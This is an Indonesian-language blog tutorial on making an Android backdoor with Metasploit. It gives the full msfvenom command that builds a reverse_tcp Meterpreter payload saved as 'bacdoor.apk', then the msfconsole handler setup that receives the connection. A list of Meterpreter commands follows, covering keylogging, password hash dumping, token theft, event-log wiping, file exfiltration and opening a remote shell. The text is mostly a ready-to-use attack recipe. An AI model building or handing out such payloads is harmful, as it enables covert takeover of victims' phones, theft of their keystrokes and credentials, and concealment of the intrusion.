MASIGNCLEAN101

Cara Membuat Payload Msfvenom Metasploit

iklan banner

MEMBUAT MSFVENOM METASPLOIT


Metasploit sudah sangat populer karna bisa di gunakan lewat termux, kali-nethunter, Gnuroot dan lain-lain. Mulai dari hp android sampai kumputer. Buat kita pemula metasploit mungkin akan bingung bagaimana cara membuat payload nya. Untuk itu pada tutorial kali saya coba share cara membuat msfvenom payload untuk hp android

Bila ingin membuat payload ini pastikan sobat sudah menginstall metasploitnya tanpa eror, cara install nya bisa sobat search di google, karna sudah banyak yang share cara install nya.

Sedikit tips: bila gagal atau eror dalam menginstall metasploit maka cobalah install di github yang lain. Misal di githu  A gagal atau eror saat penginstalan maka sobat coba lagi install di github B, bila di github B gagal dan eror juga maka coba lagi di github C, biasanya akan berhasil. Seperti itu tips dari saya, semoga bermanfaat.

Kita kembali untuk cara membuat payload metasploit android untuk satu jaringan. Saya anggap sobat sudah menginstal metasploit-pramework nya. Dan untuk langkah pertama siapkan IP punya sobat dulu. Cara melihat Ip kita sebagai berikut:


MELIHAT IP DI TERMUX

 Di termux ketik:
ifconfig

Nanti akan muncul tampilan kurang lebih seperti gambar ini:


Contoh letak ip yang saya dapat di situ sudah saya lingkari warna merah, yaitu setelah> inet addr: 10.118.29.67

Note: kita masing2 punya IP yang berbeda, tidak sama jadi lihat sendiri di hp sobat

Setelah sobat mendapatkan IP nya lalu catat atau di ingat baik baik. Sekarang untuk langkah kedua:


MEMBUAT MSFVENOM


KETIK


  • msfvenom -p android/meterpreter/reverse_tcp lhost=Ip_Kamu lport=8080 -o /sdcard/bacdoor.apk


Tunggu beberapa menit untuk proses pembuatan payload nya. Setelah beberapa menit dan selesai seperti gambar di bawah

Contoh Selesai:



Seharusnya payload nya sudah tersimpan di sdcard seperti ini:



Tahap dua sudah selesai, sekarang lanjut untuk tahap ketiga membuat remote msfconsole nya


MEMBUAT MSFCONSOLE

KETIK:


  1. msfconsole
  2. use exploit/multi/handler
  3. set payload android/meterpreter/reverse_tcp
  4. set lhost Ip_Kamu
  5. set lport 8080
  6. run

Hasil Gambar:



Untuk percobaan silahkan sobat install payload apk yang di buat tadi. Bila berhasil nanti tulisan di MSFCONSOLE akan berubah menjadi Meterpreter yang tanda nya sudah berhasil conect.

Untuk langkah selanjutnya setelah tulisan meterpreter sobat tinggal ketik help untuk melihat daftar perintah lengkap nya. Berikut beberapa daftar perintah dasar metasploit.


PERINTAH DASAR METASPLOIT

  1. help - help menu
  2. background - meletakan sesi saat ini untuk latar belakang
  3. bgkill - kills background meterpreter script
  4. bglist - memberikan daftar semua skrip yang berjalan di background
  5. bgrun - menjalankan script di background thread
  6. channel - menampilkan channel yang aktiv
  7. close - menutup channel yang aktiv 
  8. exit - mengakhiri sessi meterpreter 
  9. quit - mengakhiri sessi meterpreter 
  10. interact - berinteraksi dengan channel
  11. irb - masuk ke Ruby scripting mode 
  12. migrate - memindahkan proses aktif untuk PID yang ditunjuk
  13. adre - membaca data dari channel
  14. run - mengeksekusi meterpreter script yang sudah di setting
  15. use - memuat ekstensi meterpreter 
  16. write - menulis data di channel Perintah File System
  17. cat - mambaca output dari isi file 
  18. cd - mengganti direktory target
  19. del - menghapus file di target
  20. download - download file dari system target ke system si attacker
  21. edit - edit file
  22. getlwd - menampilkan local directory 
  23. getwd - menampilkan directory yang bekerja di target
  24. lcd - mengganti local directory
  25. lpwd - menampilkan local directory 
  26. ls - list files dalam directory 
  27. mkdir - membuat directory di system tujuan
  28. pwd - menampilkan working directory 
  29. rm - menghapus file
  30. rmdir - menghapus directory di system si tujuan
  31. upload - upload file dari si attacker system ke komputer tujuan Perintah Networking / jaringan
  32. ipconfig - menampilkan network interfaces dan informasinya termasuk IP addres dan lainnya
  33. portfwd - forwards port dari sistem si tujuan ke remote service route Perintah System
  34. clearav - membersihkan event logs di komputer tujuan
  35. drop_token - mendrop token yang dicuri execute - mengeksekusi perintah
  36. getpid - mengambil process ID (PID) 
  37. getprivs - mengambil hak akses jika itu memungkinkan
  38. getuid - untuk mengambil userID di server yang sedang berjalan
  39. kill - mengakhiri process
  40. reboot - merestart komputer tujuan 
  41. reg - berinteraksi dengan registry di komputer tujuan
  42. rev2self - memanggil Revert To Self () di komputer tujuan
  43. shell - membuka perintah shell di komputer tujuan
  44. shutdown - shuts down komputer tujuan 
  45. steal_token - mencoba untuk mencuri tanda spesifik (PID) proses
  46. sysinfo - mendapat rincian tentang komputer tujuan seperti OS dan nama pengguna Perintah User Interface  
  47. enumdesktops - daftar semua desktop yang dapat diakses
  48. getdesktop - mendapatkan dekstop saat meterpreter dijalankan
  49. idletime - untuk mengecek berapa lama sistem tujuan tidak dijalankan 
  50. keyscan_dump - dumps dari isi keylogger
  51. keyscan_start - menjalankan keylogger 
  52. keyscan_stop - menghentikan proses keylogging
  53. screenshot - mengambil gambar dari meterpreter yang dijalankan 
  54. set_desktop - mengganti meterpreter desktop
  55. uictl - memungkinkan kontrol dari beberapa komponen user interface Perintah Password Dump
  56. hashdump - untuk dump password
  57. timestomp - untuk membuat atribut dari sebuah file 



Nah itulah beberapa yang bisa saya share tentang metasploit di artikel ini, semoga bisa membantu fan Terima Kasih.
Share This :